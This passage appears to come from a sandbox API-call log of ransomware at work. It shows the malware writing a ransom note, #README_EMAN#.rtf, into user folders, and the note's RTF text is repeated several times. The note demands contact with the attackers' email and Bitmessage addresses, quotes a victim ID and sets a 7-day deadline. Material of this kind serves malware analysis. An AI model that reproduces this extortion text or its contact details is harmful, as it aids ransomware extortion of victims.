worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.184] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.185] CloseHandle (hObject=0x2ec) returned 1 [0291.185] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0291.185] GetLastError () returned 0x2 [0291.185] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.187] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.187] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.187] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 